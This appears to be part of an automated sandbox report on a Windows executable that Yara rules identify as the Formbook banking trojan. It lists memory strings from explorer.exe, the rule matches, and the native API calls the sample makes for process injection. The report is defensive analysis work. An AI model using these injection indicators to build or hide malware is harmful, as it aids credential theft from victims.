Source: explorer.exe, 00000005.00000003.3106253540.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4093721221.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3426649414.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000005.00000003.3106253540.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4093721221.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3426649414.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000005.00000000.1672208552.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000005.00000000.1665871823.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3427001072.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3106606841.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4095689522.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000005.00000000.1665871823.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3427001072.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3106606841.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4095689522.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000005.00000000.1661541002.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4092474613.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4091496578.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1662369450.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000005.00000003.3106606841.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1665871823.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4095689522.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3427001072.0000000009701000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1665871823.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3427001072.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3106606841.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4095689522.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000005.00000003.3106606841.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1665871823.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4095689522.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3427001072.0000000009701000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000005.00000002.4093721221.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000005.00000002.4093721221.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000005.00000000.1672208552.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4100977951.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000005.00000002.4093721221.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000005.00000000.1672208552.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4100977951.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000005.00000000.1672208552.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4100977951.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000005.00000000.1672208552.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4100977951.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000005.00000000.1672208552.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4100977951.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4093721221.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000005.00000000.1663822771.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_008A2361 GetProcessHeap,HeapAlloc,CreateStreamOnHGlobal,OpenClipboard,GetLastError,EmptyClipboard,GetHGlobalFromStream,SetClipboardData,CloseClipboard,GetProcessHeap,HeapFree,

6_2_008A2361

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_008A2361 GetProcessHeap,HeapAlloc,CreateStreamOnHGlobal,OpenClipboard,GetLastError,EmptyClipboard,GetHGlobalFromStream,SetClipboardData,CloseClipboard,GetProcessHeap,HeapFree,

6_2_008A2361

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.4103236234.000000000FBD4000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: mQY9ka5sW6hv2Ri.exe PID: 6912, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: mQY9ka5sW6hv2Ri.exe PID: 2676, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msdt.exe PID: 6956, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041A360 NtCreateFile,	4_2_0041A360
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041A410 NtReadFile,	4_2_0041A410
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041A490 NtClose,	4_2_0041A490
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041A540 NtAllocateVirtualMemory,	4_2_0041A540
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041A40A NtReadFile,	4_2_0041A40A
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041A48C NtClose,	4_2_0041A48C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041A53D NtAllocateVirtualMemory,	4_2_0041A53D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2B60 NtClose,LdrInitializeThunk,	4_2_011D2B60
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_011D2BF0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2AD0 NtReadFile,LdrInitializeThunk,	4_2_011D2AD0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_011D2D10
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_011D2D30
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2DD0 NtDelayExecution,LdrInitializeThunk,	4_2_011D2DD0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_011D2DF0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_011D2C70
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_011D2CA0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2F30 NtCreateSection,LdrInitializeThunk,	4_2_011D2F30
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2F90 NtProtectVirtualMemory,LdrInitializeThunk,	4_2_011D2F90
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2FB0 NtResumeThread,LdrInitializeThunk,	4_2_011D2FB0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2FE0 NtCreateFile,LdrInitializeThunk,	4_2_011D2FE0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_011D2E80
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_011D2EA0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D4340 NtSetContextThread,	4_2_011D4340
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D4650 NtSuspendThread,	4_2_011D4650
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2B80 NtQueryInformationFile,	4_2_011D2B80
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2BA0 NtEnumerateValueKey,	4_2_011D2BA0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2BE0 NtQueryValueKey,	4_2_011D2BE0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2AB0 NtWaitForSingleObject,	4_2_011D2AB0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2AF0 NtWriteFile,	4_2_011D2AF0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2D00 NtSetInformationFile,	4_2_011D2D00
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2DB0 NtEnumerateKey,	4_2_011D2DB0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2C00 NtQueryInformationProcess,	4_2_011D2C00
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2C60 NtCreateKey,	4_2_011D2C60
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2CC0 NtQueryVirtualMemory,	4_2_011D2CC0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2CF0 NtOpenProcess,	4_2_011D2CF0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2F60 NtCreateProcessEx,	4_2_011D2F60
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2FA0 NtQuerySection,	4_2_011D2FA0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2E30 NtWriteVirtualMemory,	4_2_011D2E30
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2EE0 NtQueueApcThread,	4_2_011D2EE0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D3010 NtOpenDirectoryObject,	4_2_011D3010
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D3090 NtSetValueKey,	4_2_011D3090
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D35C0 NtCreateMutant,	4_2_011D35C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D39B0 NtGetContextThread,	4_2_011D39B0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D3D10 NtOpenProcessToken,	4_2_011D3D10
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D3D70 NtOpenThread,	4_2_011D3D70
